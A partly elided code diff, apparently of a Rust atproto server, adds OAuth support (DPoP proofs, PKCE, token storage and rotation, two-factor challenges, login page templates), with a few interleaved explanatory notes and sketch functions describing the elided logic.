        metadata: &ClientMetadata,
···
        }
        Ok(())
    }
+
    fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> {
        if uri.contains('#') {
            return Err(OAuthError::InvalidClient(
···
        Ok(())
    }
}
+
impl ClientMetadata {
    pub fn requires_dpop(&self) -> bool {
        self.dpop_bound_access_tokens.unwrap_or(false)
    }
+
    pub fn auth_method(&self) -> &str {
        self.token_endpoint_auth_method
            .as_deref()
            .unwrap_or("none")
    }
}
+
pub async fn verify_client_auth(
    cache: &ClientMetadataCache,
    metadata: &ClientMetadata,
···
        ))),
    }
}
+
async fn verify_private_key_jwt_async(
    cache: &ClientMetadataCache,
    metadata: &ClientMetadata,
···
        "client_assertion signature verification failed".to_string(),
    ))
}
+
fn verify_es256(
    key: &serde_json::Value,
    signing_input: &str,
···
        .verify(signing_input.as_bytes(), &sig)
        .map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
}
+
fn verify_es384(
    key: &serde_json::Value,
    signing_input: &str,
···
        .verify(signing_input.as_bytes(), &sig)
        .map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
}
+
fn verify_rsa(
    _alg: &str,
    _key: &serde_json::Value,
···
        "RSA signature verification not yet supported - use EC keys".to_string(),
    ))
}
+
fn verify_eddsa(
    key: &serde_json::Value,
    signing_input: &str,
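`ClientMetadataCache` keys cached entries by `client_id` and stamps them with `std::time::Instant`. The expiry test hidden in the elided body of `get` amounts to the helper below (a sketch, assuming the entry's age is compared against `cache_ttl_secs`):

```rust
use std::time::Instant;

// Freshness test for a TTL cache entry: serve from cache only while its age
// stays under the configured TTL.
fn is_fresh(cached_at: Instant, ttl_secs: u64) -> bool {
    cached_at.elapsed().as_secs() < ttl_secs
}
```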
+2 src/oauth/db/client.rs
···
use sqlx::PgPool;
use super::super::{AuthorizedClientData, OAuthError};
use super::helpers::{from_json, to_json};
+
pub async fn upsert_authorized_client(
    pool: &PgPool,
    did: &str,
···
    .await?;
    Ok(())
}
+
pub async fn get_authorized_client(
    pool: &PgPool,
    did: &str,

+8 src/oauth/db/device.rs
···
use chrono::{DateTime, Utc};
use sqlx::PgPool;
use super::super::{DeviceData, OAuthError};
+
pub struct DeviceAccountRow {
    pub did: String,
    pub handle: String,
    pub email: Option<String>,
    pub last_used_at: DateTime<Utc>,
}
+
pub async fn create_device(
    pool: &PgPool,
    device_id: &str,
···
    .await?;
    Ok(())
}
+
pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> {
    let row = sqlx::query!(
        r#"
···
        last_seen_at: r.last_seen_at,
    }))
}
+
pub async fn update_device_last_seen(
    pool: &PgPool,
    device_id: &str,
···
    .await?;
    Ok(())
}
+
pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> {
    sqlx::query!(
        r#"
···
    .await?;
    Ok(())
}
+
pub async fn upsert_account_device(
    pool: &PgPool,
    did: &str,
···
    .await?;
    Ok(())
}
+
pub async fn get_device_accounts(
    pool: &PgPool,
    device_id: &str,
···
    })
    .collect())
}
+
pub async fn verify_account_on_device(
    pool: &PgPool,
    device_id: &str,

+2 src/oauth/db/dpop.rs
···
use sqlx::PgPool;
use super::super::OAuthError;
+
pub async fn check_and_record_dpop_jti(
    pool: &PgPool,
    jti: &str,
···
    .await?;
    Ok(result.rows_affected() > 0)
}
+
pub async fn cleanup_expired_dpop_jtis(
    pool: &PgPool,
    max_age_secs: i64,

+2 src/oauth/db/helpers.rs
···
use serde::{de::DeserializeOwned, Serialize};
use super::super::OAuthError;
+
pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> {
    serde_json::to_value(value).map_err(|e| {
        tracing::error!("JSON serialization error: {}", e);
        OAuthError::ServerError("Internal serialization error".to_string())
    })
}
+
pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> {
    serde_json::from_value(value).map_err(|e| {
        tracing::error!("JSON deserialization error: {}", e);

+1 src/oauth/db/mod.rs
+6 src/oauth/db/request.rs
···
use sqlx::PgPool;
use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData};
use super::helpers::{from_json, to_json};
+
pub async fn create_authorization_request(
    pool: &PgPool,
    request_id: &str,
···
    .await?;
    Ok(())
}
+
pub async fn get_authorization_request(
    pool: &PgPool,
    request_id: &str,
···
        None => Ok(None),
    }
}
+
pub async fn update_authorization_request(
    pool: &PgPool,
    request_id: &str,
···
    .await?;
    Ok(())
}
+
pub async fn consume_authorization_request_by_code(
    pool: &PgPool,
    code: &str,
···
        None => Ok(None),
    }
}
+
pub async fn delete_authorization_request(
    pool: &PgPool,
    request_id: &str,
···
    .await?;
    Ok(())
}
+
pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> {
    let result = sqlx::query!(
        r#"
+12 src/oauth/db/token.rs
···
use sqlx::PgPool;
use super::super::{OAuthError, TokenData};
use super::helpers::{from_json, to_json};
+
pub async fn create_token(
    pool: &PgPool,
    data: &TokenData,
···
    .await?;
    Ok(row.id)
}
+
pub async fn get_token_by_id(
    pool: &PgPool,
    token_id: &str,
···
        None => Ok(None),
    }
}
+
pub async fn get_token_by_refresh_token(
    pool: &PgPool,
    refresh_token: &str,
···
        None => Ok(None),
    }
}
+
pub async fn rotate_token(
    pool: &PgPool,
    old_db_id: i32,
···
    tx.commit().await?;
    Ok(())
}
+
pub async fn check_refresh_token_used(
    pool: &PgPool,
    refresh_token: &str,
···
    .await?;
    Ok(row)
}
+
pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> {
    sqlx::query!(
        r#"
···
    .await?;
    Ok(())
}
+
pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> {
    sqlx::query!(
        r#"
···
    .await?;
    Ok(())
}
+
pub async fn list_tokens_for_user(
    pool: &PgPool,
    did: &str,
···
    }
    Ok(tokens)
}
+
pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> {
    let count = sqlx::query_scalar!(
        r#"
···
    .await?;
    Ok(count)
}
+
pub async fn delete_oldest_tokens_for_user(
    pool: &PgPool,
    did: &str,
···
    .await?;
    Ok(result.rows_affected())
}
+
const MAX_TOKENS_PER_USER: i64 = 100;
+
pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> {
    let count = count_tokens_for_user(pool, did).await?;
    if count > MAX_TOKENS_PER_USER {
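The diff cuts `enforce_token_limit_for_user` off right after the count check. A plausible completion is sketched below; the arguments of `delete_oldest_tokens_for_user` are not visible here, so the `excess` parameter is an assumption, not the crate's actual signature:

```rust
// Plausible completion (an assumption, not the crate's code): evict the oldest
// tokens once a user exceeds the per-user cap.
pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> {
    let count = count_tokens_for_user(pool, did).await?;
    if count > MAX_TOKENS_PER_USER {
        let excess = count - MAX_TOKENS_PER_USER;
        let dropped = delete_oldest_tokens_for_user(pool, did, excess).await?;
        tracing::info!(did, dropped, "evicted oldest OAuth tokens over the per-user cap");
    }
    Ok(())
}
```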
+9 src/oauth/db/two_factor.rs
···
use sqlx::PgPool;
use uuid::Uuid;
use super::super::OAuthError;
+
pub struct TwoFactorChallenge {
    pub id: Uuid,
    pub did: String,
···
    pub created_at: DateTime<Utc>,
    pub expires_at: DateTime<Utc>,
}
+
pub fn generate_2fa_code() -> String {
    let mut rng = rand::thread_rng();
    let code: u32 = rng.gen_range(0..1_000_000);
    format!("{:06}", code)
}
+
pub async fn create_2fa_challenge(
    pool: &PgPool,
    did: &str,
···
        expires_at: row.expires_at,
    })
}
+
pub async fn get_2fa_challenge(
    pool: &PgPool,
    request_uri: &str,
···
        expires_at: r.expires_at,
    }))
}
+
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
    let row = sqlx::query!(
        r#"
···
    .await?;
    Ok(row.attempts)
}
+
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
    sqlx::query!(
        r#"
···
    .await?;
    Ok(())
}
+
pub async fn delete_2fa_challenge_by_request_uri(
    pool: &PgPool,
    request_uri: &str,
···
    .await?;
    Ok(())
}
+
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
    let result = sqlx::query!(
        r#"
···
    .await?;
    Ok(result.rows_affected())
}
+
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
    let row = sqlx::query!(
        r#"
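`generate_2fa_code` relies on `format!("{:06}", …)` to zero-pad codes below 100000 so they are always six characters. A small illustrative test (not part of the diff) that pins down that property:

```rust
#[test]
fn two_factor_codes_are_six_digits() {
    // gen_range(0..1_000_000) formatted with {:06} always yields exactly six
    // ASCII digits, including leading zeros.
    for _ in 0..1_000 {
        let code = generate_2fa_code();
        assert_eq!(code.len(), 6);
        assert!(code.chars().all(|c| c.is_ascii_digit()));
    }
}
```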
+20 src/oauth/dpop.rs
···
use chrono::Utc;
use serde::{Deserialize, Serialize};
use sha2::{Digest, Sha256};
+
use super::OAuthError;
+
const DPOP_NONCE_VALIDITY_SECS: i64 = 300;
const DPOP_MAX_AGE_SECS: i64 = 300;
+
#[derive(Debug, Clone)]
pub struct DPoPVerifyResult {
    pub jkt: String,
    pub jti: String,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DPoPProofHeader {
    pub typ: String,
    pub alg: String,
    pub jwk: DPoPJwk,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DPoPJwk {
    pub kty: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub y: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DPoPProofPayload {
    pub jti: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub nonce: Option<String>,
}
+
pub struct DPoPVerifier {
    secret: Vec<u8>,
}
+
impl DPoPVerifier {
    pub fn new(secret: &[u8]) -> Self {
        Self {
            secret: secret.to_vec(),
        }
    }
+
    pub fn generate_nonce(&self) -> String {
        let timestamp = Utc::now().timestamp();
        let timestamp_bytes = timestamp.to_be_bytes();
···
        nonce_data.extend_from_slice(&hash[..16]);
        URL_SAFE_NO_PAD.encode(&nonce_data)
    }
+
    pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> {
        let nonce_bytes = URL_SAFE_NO_PAD
            .decode(nonce)
···
        }
        Ok(())
    }
+
    pub fn verify_proof(
        &self,
        dpop_header: &str,
···
        })
    }
}
+
fn verify_dpop_signature(
    alg: &str,
    jwk: &DPoPJwk,
···
        ))),
    }
}
+
fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
    use p256::ecdsa::signature::Verifier;
    use p256::ecdsa::{Signature, VerifyingKey};
···
        .verify(message, &sig)
        .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
}
+
fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
    use p384::ecdsa::signature::Verifier;
    use p384::ecdsa::{Signature, VerifyingKey};
···
        .verify(message, &sig)
        .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
}
+
fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
    use ed25519_dalek::{Signature, VerifyingKey};
    let crv = jwk.crv.as_ref().ok_or_else(|| {
···
        .verify_strict(message, &sig)
        .map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
}
+
pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> {
    let canonical = match jwk.kty.as_str() {
        "EC" => {
···
    let hash = hasher.finalize();
    Ok(URL_SAFE_NO_PAD.encode(&hash))
}
+
pub fn compute_access_token_hash(access_token: &str) -> String {
    let mut hasher = Sha256::new();
    hasher.update(access_token.as_bytes());
    let hash = hasher.finalize();
    URL_SAFE_NO_PAD.encode(&hash)
}
+
#[cfg(test)]
mod tests {
    use super::*;
+
    #[test]
    fn test_nonce_generation_and_validation() {
        let secret = b"test-secret-key-32-bytes-long!!!";
···
        let nonce = verifier.generate_nonce();
        assert!(verifier.validate_nonce(&nonce).is_ok());
    }
+
    #[test]
    fn test_jwk_thumbprint_ec() {
        let jwk = DPoPJwk {
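`compute_jwk_thumbprint` follows RFC 7638: for an EC key the canonical JSON contains only `crv`, `kty`, `x`, `y` in lexicographic order with no whitespace, then SHA-256, then base64url without padding. A self-contained sketch of that EC branch (independent of the elided body above, which also covers other key types):

```rust
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use base64::Engine;
use sha2::{Digest, Sha256};

// RFC 7638 thumbprint for an EC public key.
fn ec_thumbprint(crv: &str, x: &str, y: &str) -> String {
    let canonical = format!(r#"{{"crv":"{}","kty":"EC","x":"{}","y":"{}"}}"#, crv, x, y);
    let digest = Sha256::digest(canonical.as_bytes());
    URL_SAFE_NO_PAD.encode(digest)
}
```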
+5 src/oauth/endpoints/metadata.rs
···
use serde::{Deserialize, Serialize};
use crate::state::AppState;
use crate::oauth::jwks::{JwkSet, create_jwk_set};
+
#[derive(Debug, Serialize, Deserialize)]
pub struct ProtectedResourceMetadata {
    pub resource: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub resource_documentation: Option<String>,
}
+
#[derive(Debug, Serialize, Deserialize)]
pub struct AuthorizationServerMetadata {
    pub issuer: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub introspection_endpoint: Option<String>,
}
+
pub async fn oauth_protected_resource(
    State(_state): State<AppState>,
) -> Json<ProtectedResourceMetadata> {
···
        resource_documentation: Some("https://atproto.com".to_string()),
    })
}
+
pub async fn oauth_authorization_server(
    State(_state): State<AppState>,
) -> Json<AuthorizationServerMetadata> {
···
        introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)),
    })
}
+
pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> {
    use crate::config::AuthConfig;
    use crate::oauth::jwks::Jwk;
+1 src/oauth/endpoints/mod.rs

+6 src/oauth/endpoints/par.rs
···
    client::ClientMetadataCache,
    db,
};
+
const PAR_EXPIRY_SECONDS: i64 = 600;
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
+
#[derive(Debug, Deserialize)]
pub struct ParRequest {
    pub response_type: String,
···
    #[serde(default)]
    pub client_assertion_type: Option<String>,
}
+
#[derive(Debug, Serialize)]
pub struct ParResponse {
    pub request_uri: String,
    pub expires_in: u64,
}
+
pub async fn pushed_authorization_request(
    State(state): State<AppState>,
    headers: HeaderMap,
···
        expires_in: PAR_EXPIRY_SECONDS as u64,
    }))
}
+
fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> {
    if let (Some(assertion), Some(assertion_type)) =
        (&request.client_assertion, &request.client_assertion_type)
···
    }
    Ok(ClientAuth::None)
}
+
fn validate_scope(
    requested_scope: &Option<String>,
    client_metadata: &crate::oauth::client::ClientMetadata,
+3 src/oauth/endpoints/token/grants.rs
···
};
use super::types::{TokenRequest, TokenResponse};
use super::helpers::{create_access_token, verify_pkce};
+
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60;
+
pub async fn handle_authorization_code_grant(
    state: AppState,
    _headers: HeaderMap,
···
        }),
    ))
}
+
pub async fn handle_refresh_token_grant(
    state: AppState,
    _headers: HeaderMap,

+5 src/oauth/endpoints/token/helpers.rs
···
use subtle::ConstantTimeEq;
use crate::config::AuthConfig;
use crate::oauth::OAuthError;
+
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
+
pub struct TokenClaims {
    pub jti: String,
    pub exp: i64,
    pub iat: i64,
}
+
pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> {
    let mut hasher = Sha256::new();
    hasher.update(code_verifier.as_bytes());
···
    }
    Ok(())
}
+
pub fn create_access_token(
    token_id: &str,
    sub: &str,
···
    let signature_b64 = URL_SAFE_NO_PAD.encode(&signature);
    Ok(format!("{}.{}", signing_input, signature_b64))
}
+
pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> {
    let parts: Vec<&str> = token.split('.').collect();
    if parts.len() != 3 {
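`verify_pkce` implements the S256 method: the SHA-256 of the `code_verifier`, base64url-encoded without padding, must match the stored `code_challenge`, compared in constant time via `subtle`. A boolean sketch of that relation (the real function above returns an `OAuthError` on mismatch):

```rust
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use base64::Engine;
use sha2::{Digest, Sha256};
use subtle::ConstantTimeEq;

// S256: BASE64URL(SHA256(code_verifier)) == code_challenge, compared in constant time.
fn pkce_s256_matches(code_challenge: &str, code_verifier: &str) -> bool {
    let computed = URL_SAFE_NO_PAD.encode(Sha256::digest(code_verifier.as_bytes()));
    computed.as_bytes().ct_eq(code_challenge.as_bytes()).into()
}
```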
+5 src/oauth/endpoints/token/introspect.rs
···
use crate::state::{AppState, RateLimitKind};
use crate::oauth::{OAuthError, db};
use super::helpers::extract_token_claims;
+
#[derive(Debug, Deserialize)]
pub struct RevokeRequest {
    pub token: Option<String>,
    #[serde(default)]
    pub token_type_hint: Option<String>,
}
+
pub async fn revoke_token(
    State(state): State<AppState>,
    headers: HeaderMap,
···
    }
    Ok(StatusCode::OK)
}
+
#[derive(Debug, Deserialize)]
pub struct IntrospectRequest {
    pub token: String,
    #[serde(default)]
    pub token_type_hint: Option<String>,
}
+
#[derive(Debug, Serialize)]
pub struct IntrospectResponse {
    pub active: bool,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub jti: Option<String>,
}
+
pub async fn introspect_token(
    State(state): State<AppState>,
    headers: HeaderMap,

+4 src/oauth/endpoints/token/mod.rs
···
mod helpers;
mod introspect;
mod types;
+
use axum::{
    Form, Json,
    extract::State,
···
};
use crate::state::{AppState, RateLimitKind};
use crate::oauth::OAuthError;
+
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims};
pub use introspect::{
    introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest,
};
pub use types::{TokenRequest, TokenResponse};
+
fn extract_client_ip(headers: &HeaderMap) -> String {
    if let Some(forwarded) = headers.get("x-forwarded-for") {
        if let Ok(value) = forwarded.to_str() {
···
    }
    "unknown".to_string()
}
+
pub async fn token_endpoint(
    State(state): State<AppState>,
    headers: HeaderMap,

+2 src/oauth/endpoints/token/types.rs
···
use serde::{Deserialize, Serialize};
+
#[derive(Debug, Deserialize)]
pub struct TokenRequest {
    pub grant_type: String,
···
    #[serde(default)]
    pub client_assertion_type: Option<String>,
}
+
#[derive(Debug, Serialize)]
pub struct TokenResponse {
    pub access_token: String,
+5 src/oauth/error.rs
···
    response::{IntoResponse, Response},
};
use serde::Serialize;
+
#[derive(Debug)]
pub enum OAuthError {
    InvalidRequest(String),
···
    InvalidToken(String),
    RateLimited,
}
+
#[derive(Serialize)]
struct OAuthErrorResponse {
    error: String,
    error_description: Option<String>,
}
+
impl IntoResponse for OAuthError {
    fn into_response(self) -> Response {
        let (status, error, description) = match self {
···
        .into_response()
    }
}
+
impl From<sqlx::Error> for OAuthError {
    fn from(err: sqlx::Error) -> Self {
        tracing::error!("Database error in OAuth flow: {}", err);
        OAuthError::ServerError("An internal error occurred".to_string())
    }
}
+
impl From<anyhow::Error> for OAuthError {
    fn from(err: anyhow::Error) -> Self {
        tracing::error!("Internal error in OAuth flow: {}", err);

+3 src/oauth/jwks.rs
···
use serde::{Deserialize, Serialize};
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JwkSet {
    pub keys: Vec<Jwk>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Jwk {
    pub kty: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub y: Option<String>,
}
+
pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet {
    JwkSet { keys }
}

+1 src/oauth/mod.rs
+10 src/oauth/templates.rs
···
use chrono::{DateTime, Utc};
+
fn base_styles() -> &'static str {
    r#"
    :root {
···
    }
    "#
}
+
pub fn login_page(
    client_id: &str,
    client_name: Option<&str>,
···
        login_hint_value = html_escape(login_hint_value),
    )
}
+
pub struct DeviceAccount {
    pub did: String,
    pub handle: String,
    pub email: Option<String>,
    pub last_used_at: DateTime<Utc>,
}
+
pub fn account_selector_page(
    client_id: &str,
    client_name: Option<&str>,
···
        request_uri_encoded = urlencoding::encode(request_uri),
    )
}
+
pub fn two_factor_page(
    request_uri: &str,
    channel: &str,
···
        error_html = error_html,
    )
}
+
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
    let description = error_description.unwrap_or("An error occurred during the authorization process.");
    format!(
···
        description = html_escape(description),
    )
}
+
pub fn success_page(client_name: Option<&str>) -> String {
    let client_display = client_name.unwrap_or("The application");
    format!(
···
        client_display = html_escape(client_display),
    )
}
+
fn html_escape(s: &str) -> String {
    s.replace('&', "&amp;")
        .replace('<', "&lt;")
···
        .replace('"', "&quot;")
        .replace('\'', "&#39;")
}
+
fn get_initials(handle: &str) -> String {
    let clean = handle.trim_start_matches('@');
    if clean.is_empty() {
···
    }
    clean.chars().next().unwrap_or('?').to_uppercase().to_string()
}
+
pub fn mask_email(email: &str) -> String {
    if let Some(at_pos) = email.find('@') {
        let local = &email[..at_pos];
+27 src/oauth/types.rs
···
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use serde_json::Value as JsonValue;
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct RequestId(pub String);
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TokenId(pub String);
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DeviceId(pub String);
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SessionId(pub String);
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Code(pub String);
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct RefreshToken(pub String);
+
impl RequestId {
    pub fn generate() -> Self {
        Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4()))
    }
}
+
impl TokenId {
    pub fn generate() -> Self {
        Self(uuid::Uuid::new_v4().to_string())
    }
}
+
impl DeviceId {
    pub fn generate() -> Self {
        Self(uuid::Uuid::new_v4().to_string())
    }
}
+
impl SessionId {
    pub fn generate() -> Self {
        Self(uuid::Uuid::new_v4().to_string())
    }
}
+
impl Code {
    pub fn generate() -> Self {
        use rand::Rng;
···
        ))
    }
}
+
impl RefreshToken {
    pub fn generate() -> Self {
        use rand::Rng;
···
        ))
    }
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "method")]
pub enum ClientAuth {
···
    #[serde(rename = "private_key_jwt")]
    PrivateKeyJwt { client_assertion: String },
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct AuthorizationRequestParameters {
    pub response_type: String,
···
    #[serde(flatten)]
    pub extra: Option<JsonValue>,
}
+
#[derive(Debug, Clone)]
pub struct RequestData {
    pub client_id: String,
···
    pub device_id: Option<String>,
    pub code: Option<String>,
}
+
#[derive(Debug, Clone)]
pub struct DeviceData {
    pub session_id: String,
···
    pub ip_address: String,
    pub last_seen_at: DateTime<Utc>,
}
+
#[derive(Debug, Clone)]
pub struct TokenData {
    pub did: String,
···
    pub current_refresh_token: Option<String>,
    pub scope: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct AuthorizedClientData {
    pub scope: Option<String>,
    pub remember: bool,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct OAuthClientMetadata {
    pub client_id: String,
···
    pub jwks_uri: Option<String>,
    pub application_type: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ProtectedResourceMetadata {
    pub resource: String,
···
    pub scopes_supported: Vec<String>,
    pub resource_documentation: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct AuthorizationServerMetadata {
    pub issuer: String,
···
    pub dpop_signing_alg_values_supported: Option<Vec<String>>,
    pub authorization_response_iss_parameter_supported: Option<bool>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ParResponse {
    pub request_uri: String,
    pub expires_in: u64,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TokenResponse {
    pub access_token: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub sub: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TokenRequest {
    pub grant_type: String,
···
    pub client_id: Option<String>,
    pub client_secret: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DPoPClaims {
    pub jti: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub nonce: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JwkPublicKey {
    pub kty: String,
···
    pub kid: Option<String>,
    pub alg: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Jwks {
    pub keys: Vec<JwkPublicKey>,
+14 src/oauth/verify.rs
···
use sha2::Sha256;
use sqlx::PgPool;
use subtle::ConstantTimeEq;
+
use crate::config::AuthConfig;
use crate::state::AppState;
use super::db;
use super::dpop::DPoPVerifier;
use super::OAuthError;
+
pub struct OAuthTokenInfo {
    pub did: String,
    pub token_id: String,
···
    pub scope: Option<String>,
    pub dpop_jkt: Option<String>,
}
+
pub struct VerifyResult {
    pub did: String,
    pub token_id: String,
    pub client_id: String,
    pub scope: Option<String>,
}
+
pub async fn verify_oauth_access_token(
    pool: &PgPool,
    access_token: &str,
···
        scope: token_data.scope,
    })
}
+
pub fn extract_oauth_token_info(token: &str) -> Result<OAuthTokenInfo, OAuthError> {
    let parts: Vec<&str> = token.split('.').collect();
    if parts.len() != 3 {
···
        dpop_jkt,
    })
}
+
fn compute_ath(access_token: &str) -> String {
    use sha2::Digest;
    let mut hasher = Sha256::new();
···
    let hash = hasher.finalize();
    URL_SAFE_NO_PAD.encode(&hash)
}
+
pub fn generate_dpop_nonce() -> String {
    let config = AuthConfig::get();
    let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
    verifier.generate_nonce()
}
+
pub struct OAuthUser {
    pub did: String,
    pub client_id: Option<String>,
    pub scope: Option<String>,
    pub is_oauth: bool,
}
+
pub struct OAuthAuthError {
    pub status: StatusCode,
    pub error: String,
    pub message: String,
    pub dpop_nonce: Option<String>,
}
+
impl IntoResponse for OAuthAuthError {
    fn into_response(self) -> Response {
        let mut response = (
···
        response
    }
}
+
impl FromRequestParts<AppState> for OAuthUser {
    type Rejection = OAuthAuthError;
+
    async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> {
        let auth_header = parts
            .headers
···
            }
        }
    }
}
+
struct LegacyAuthResult {
    did: String,
}
+
async fn try_legacy_auth(pool: &PgPool, token: &str) -> Result<LegacyAuthResult, ()> {
    match crate::auth::validate_bearer_token(pool, token).await {
        Ok(user) if !user.is_oauth => Ok(LegacyAuthResult { did: user.did }),
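`compute_ath` exists to bind DPoP proofs to access tokens (RFC 9449): the proof's `ath` claim must equal the base64url SHA-256 of the presented token. A sketch of that comparison, assuming the `subtle::ConstantTimeEq` import already at the top of this file; the real check lives in the elided verification path above:

```rust
// RFC 9449 token binding: ath must equal BASE64URL(SHA256(access_token)).
fn ath_matches(proof_ath: &str, access_token: &str) -> bool {
    compute_ath(access_token)
        .as_bytes()
        .ct_eq(proof_ath.as_bytes())
        .into()
}
```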
+30 src/plc/mod.rs
···
use std::collections::HashMap;
use std::time::Duration;
use thiserror::Error;
+
#[derive(Error, Debug)]
pub enum PlcError {
    #[error("HTTP request failed: {0}")]
···
    #[error("Service unavailable (circuit breaker open)")]
    CircuitBreakerOpen,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PlcOperation {
    #[serde(rename = "type")]
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub sig: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PlcService {
    #[serde(rename = "type")]
    pub service_type: String,
    pub endpoint: String,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PlcTombstone {
    #[serde(rename = "type")]
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub sig: Option<String>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
pub enum PlcOpOrTombstone {
    Operation(PlcOperation),
    Tombstone(PlcTombstone),
}
+
impl PlcOpOrTombstone {
    pub fn is_tombstone(&self) -> bool {
        match self {
···
        }
    }
}
+
pub struct PlcClient {
    base_url: String,
    client: Client,
}
+
impl PlcClient {
    pub fn new(base_url: Option<String>) -> Self {
        let base_url = base_url.unwrap_or_else(|| {
···
            client,
        }
    }
+
    fn encode_did(did: &str) -> String {
        urlencoding::encode(did).to_string()
    }
+
    pub async fn get_document(&self, did: &str) -> Result<Value, PlcError> {
        let url = format!("{}/{}", self.base_url, Self::encode_did(did));
        let response = self.client.get(&url).send().await?;
···
        }
        response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
    }
+
    pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> {
        let url = format!("{}/{}/data", self.base_url, Self::encode_did(did));
        let response = self.client.get(&url).send().await?;
···
        }
        response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
    }
+
    pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> {
